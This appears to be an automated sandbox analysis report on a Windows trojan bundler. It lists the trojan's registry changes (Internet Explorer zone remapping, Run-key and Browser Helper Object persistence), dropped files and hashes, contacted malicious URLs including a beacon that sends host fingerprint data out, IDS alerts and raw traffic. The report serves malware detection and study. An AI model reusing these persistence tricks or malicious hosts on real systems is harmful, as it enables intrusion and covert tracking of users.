[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
"Publisher" = "Beijing Rising Information Technology, Inc."

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"ravmonexe" = "gWx0Lv5HQFoFVAYjVhUWQQwq"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"

[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\RAV"
"Type" = "17"
"InstallPath" = "%Program Files%\Rising\RAV"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monShowName" = "gWx0Lv5HYFoFGTooQE0aWgxX"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B EB 5D B8 D3 40 DB 2E 70 4B 40 80 D4 A9 85 4B"

[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
"Version" = "24.00.43.49"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"regtray" = "gWx0Lv5HYFoFbTsMa1I="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{F2565346-E9F9-6648-3030-303030303030}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monServerName" = "gWx0Lv5HYEghWB8AXVVr"

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\System\CurrentControlSet\Services]
"Rising"

The process 9158.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\9158web]
"VideoDevice" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 30 72 92 DD 80 34 D3 5E 1E C3 95 A9 B4 E1 D7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process popwndexe.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C4 C3 E0 07 87 56 EA 2D 7C F7 5D 82 1E CE 20"

The process xianfengupdate.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore\AllowedDomains\*]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"(Default)" = "AccountProtect Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF EE 9E 4D 17 3B 00 D8 11 50 97 5C F2 DD 87 FA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore]
"Flags" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 C9 DF 57 1B 7B 63 FA 3B 44 DE 4B 18 5F 10 BA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
26c9871fe8541e68df2b412884fdd3e4 c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe
4efba0b5ffd3059d1d76c70b67850138 c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe
09006a81a579d90212ccc2bb62cfecc2 c:\Documents and Settings\All Users\Application Data\tools\bdmanager.dll
231af98afa9420da45dbeff33867e39f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll
91cadaaa24017a099cce1df248e25225 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll
4f53e6f3881ff3e1ee1cc0dc0561410f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll
959ea64598b9a3e494c00e8fa793be7e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\System.dll
012a8879efa6f8dbc3c6ba58a659fefb c:\Program Files\tools\BaiduP2PService.exe
a86a90ba120c455ac0e3655f146d5a0f c:\Program Files\tools\P2PBase.dll
3b14cae0ea1d045bb5b196017913edb3 c:\Program Files\tools\P2PStatReport.dll
894ab861e608eacbac24280ab234368f c:\Program Files\tools\P2SBase.dll
83bcf3ad82ce65d2bd0fdd364fe32cb5 c:\Program Files\tools\sr.exe
3abd5c47c61a71472f00bd45991a916f c:\Program Files\tools\tools.exe
00986c841bcc897b86a2b394a1887295 c:\Program Files\xfplay\tools.exe
a5e5b2726680a87868f241264e53be5a c:\Program Files\xfplay\xianfeng.exe
c54a6cbbc8cd6c9309cc2b3aa4eba6d4 c:\Program Files\xfplay\xianfengkunbang.exe
b2ef6010ddeca9357fae34e1fbe4ee2b c:\Program Files\xfplay\xianfengupdate.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 1183744 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 1187840 20480 19968 5.41054 0437776d67d96306722fa79af85af88b
.rsrc 1208320 28672 25600 4.38322 f5640d017a00b32df01ad9febdbde008

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ww.qianniannuan.com/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5
hxxp://cdn.dh3.daicuo.com/u.php?id=89
hxxp://aq8.cc/?89-sd--ant-
hxxp://aq8.cc/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247
hxxp://aq8.cc/View/Home/Task/css.base.css?1.0.247
hxxp://aq8.cc/View/Home/Task/css.task.css?1.0.247
hxxp://aq8.cc/Public/html5shiv/3.7.2/html5shiv.min.js
hxxp://dc.cdn.daicuo.com/dc.base/1.0.3/css/base.min.css?1.0.247
hxxp://at.alicdn.com.danuoyi.alicdn.com/t/font_1415073294_4967172.eot? 188.254.86.250
hxxp://aq8.cc/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot?
hxxp://aq8.cc/Public/respond/1.4.2/respond.min.js
hxxp://aq8.cc/Public/images/sns_qq.png
hxxp://aq8.cc/Public/jquery/1.11.3/jquery.min.js?1.0.247
hxxp://cdn.dh3.daicuo.com/tool/install.txt
hxxp://aq8.cc/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247
hxxp://aq8.cc/View/Home/Task//base.js?1.0.247
hxxp://orp.n.shifen.com/query?cmd=url2finfo
hxxp://brwebapi.n.shifen.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe
hxxp://download.suxiazai.com.gls.acadn.com/for_down/2013/install1393485.exe 183.131.11.165
hxxp://mm.appkhh.com/mmliao/MM-liao8863.exe 122.227.42.227
hxxp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
hxxp://js.users.51.la/17476535.js 113.107.42.34
hxxp://brdlsw.jomodns.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
hxxp://orp.n.shifen.com/query?cmd=validurl
hxxp://e6845.dscb1.akamaiedge.net/pca3-g5.crl
hxxp://orp.n.shifen.com/commit?cmd=finfo
hxxp://e6845.dscb1.akamaiedge.net/CSC3-2010.crl
hxxp://opt.xdwscache.ourwebpic.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88
hxxp://hk.mig.tencent-cloud.net/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301
hxxp://opt.xdwscache.ourwebpic.com/temp/downloaderico/main.ico
hxxp://down.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe
hxxp://103.7.29.215/dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://opt.xdwscache.ourwebpic.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9
hxxp://1st.dl.ourdvs.com/ktv/9158chat2_ktv088_63070700.exe
hxxp://opt.xdwscache.ourwebpic.com/Downloaderconfig.aspx?imgtype=9158
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
hxxp://imgcache.qq.com.cdngc.net/ptlogin/ver/10139/js/xui.js?v=10007 151.249.89.135
hxxp://imgcache.qq.com.cdngc.net/ptlogin/v4/style/0/images/icons.gif 151.249.89.135
hxxp://opt.xdwscache.ourwebpic.com/temp/flash/1.swf
hxxp://ui.ptlogin2.qq.com/cgi-bin/report?id=89217
hxxp://j.br.baidu.com/v1/t/full/p/mini/tn/10003408/ch_dl_url.exe 111.206.37.114
hxxp://crl.verisign.com/pca3-g5.crl 23.43.133.163
hxxp://imgcache.qq.com/ptlogin/ver/10139/js/xui.js?v=10007 151.249.89.135
hxxp://123.shipinbus.com/u.php?id=89 211.101.15.220
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe 183.57.48.18
hxxp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe 183.57.48.18
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872435&flag=e96394f018d0f2b7394f88916459f7e4&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 87.245.198.83
hxxp://www.meiheitou.com/View/Home/Task/css.base.css?1.0.247 123.249.21.126
hxxp://www.meiheitou.com/?89-sd--ant- 123.249.21.126
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? 123.249.21.126
hxxp://www.meiheitou.com/Public/jquery/1.11.3/jquery.min.js?1.0.247 123.249.21.126
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl 23.43.133.163
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=88 87.245.198.83
hxxp://cdn.daicuo.cc/dc.base/1.0.3/css/base.min.css?1.0.247 58.215.177.195
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 87.245.198.83
hxxp://17990.vicp.net/1/aHR0cDovLzEyMy5zaGlwaW5idXMuY29tL3UucGhwP2lkPTg5 119.28.13.101
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1276*846&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-02-CD-FB&HardDrive=00000000000000000001&CPU=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=88&Wmarkid=63&Mtype=19&tick=1446872431&flag=72ea6a2bb016edd8a444cdd51fccfdc2&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 87.245.198.83
hxxp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe 118.123.210.46
hxxp://tj.9158.com/temp/downloaderico/main.ico 87.245.198.83
hxxp://www.meiheitou.com/Public/html5shiv/3.7.2/html5shiv.min.js 123.249.21.126
hxxp://www.meiheitou.com/Public/images/sns_qq.png 123.249.21.126
hxxp://download.suxiazai.com/for_down/2013/install1393485.exe 183.131.11.165
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/js/bootstrap.min.js?1.0.247 123.249.21.126
hxxp://www.meiheitou.com/View/Home/Task/css.task.css?1.0.247 123.249.21.126
hxxp://conf.a101.cc/tool/install.txt 211.101.15.220
hxxp://c.pc.qq.com/fcgi-bin/downurlquery?id=71960&guid=CQEjCF9zN8adOLEQHMvLiQgs3ZUZbbIyM0pyzn9CtE/lP8pJq+u226+i+UWFFd+D&ver=8.1.4016.301 103.7.30.157
hxxp://www.meiheitou.com/Public/bootstrap/3.3.5/css/bootstrap.min.css?1.0.247 123.249.21.126
hxxp://www.meiheitou.com/View/Home/Task//base.js?1.0.247 123.249.21.126
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 112.90.83.106
hxxp://www.meiheitou.com/Public/respond/1.4.2/respond.min.js 123.249.21.126
hxxp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif 151.249.89.135
hxxp://at.alicdn.com/t/font_1415073294_4967172.eot? 188.254.86.250
acc.p2sp.baidu.com 123.125.113.35
jh.01lm.com 87.245.198.75
web2.51.la 222.187.225.123
cmp2s.p2sp.baidu.com 123.125.65.117
s.p2sp.baidu.com 123.125.113.30
master.etl.desktop.qq.com 140.207.69.49
stat.p2sp.baidu.com 61.135.162.189
down.appkhh.com 222.186.129.21
media.p2sp.baidu.com 220.181.57.155
acctrack.kuaibo.com 115.231.216.36


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY Outdated Windows Flash Version IE
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System

Traffic

POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008542120341062666110713
Server: Apache
tracecode: 00008542120341062666110713
Set-Cookie: BAIDUID=32F3C5706F8B2402545910D9A50FD25A:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..
ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00016772320341062666110713
Server: Apache
tracecode: 00016772320341062666110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3CBDF2100CACB5A99:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /t/font_1415073294_4967172.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: at.alicdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 18124
Connection: keep-alive
Date: Fri, 07 Nov 2014 08:45:51 GMT
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=31557600
ETag: "FA439E838DACE2C479FFB8A09AA20DC4"
Last-Modified: Tue, 04 Nov 2014 03:54:54 GMT
x-oss-request-id: 545C86BFC642146A2828D1BE
Via: cache15.l2de1[0,200-0,H], cache9.l2de1[0,0], cache10.ru1[0,200-0,H], cache8.ru1[2,0]
Age: 31522441
X-Cache: HIT TCP_HIT dirn:9:460901958
X-Swift-SaveTime: Fri, 03 Apr 2015 19:31:55 GMT
X-Swift-CacheTime: 18818036
Timing-Allow-Origin: *
[email protected]........
..............i.c.o.n.f.o.n.t.....M.e.d.i.u.m.....V.e.r.s.i.o.n. .1...
0. .;. .t.t.f.a.u.t.o.h.i.n.t. .(.v.0...9.4.). .-.l. .8. .-.r. .5.0. .
-.G. .2.0.0. .-.x. .1.4. .-.w. .".G.". .-.f. .-.s.....i.c.o.n.f.o.n.t.
...............pFFTMm9..........OS/2W.t........`cmap.......x....cvt ..
.J..;\...$fpgm0.....;.....gasp......;T....glyf"[email protected].
[email protected]....$hmtxSW....7 ...lloca.<[email protected]....
 name......7.....post......:....8prep...f..E..............=.......}...
....}[email protected].
..x...,.,.\.,................. .................................x.....
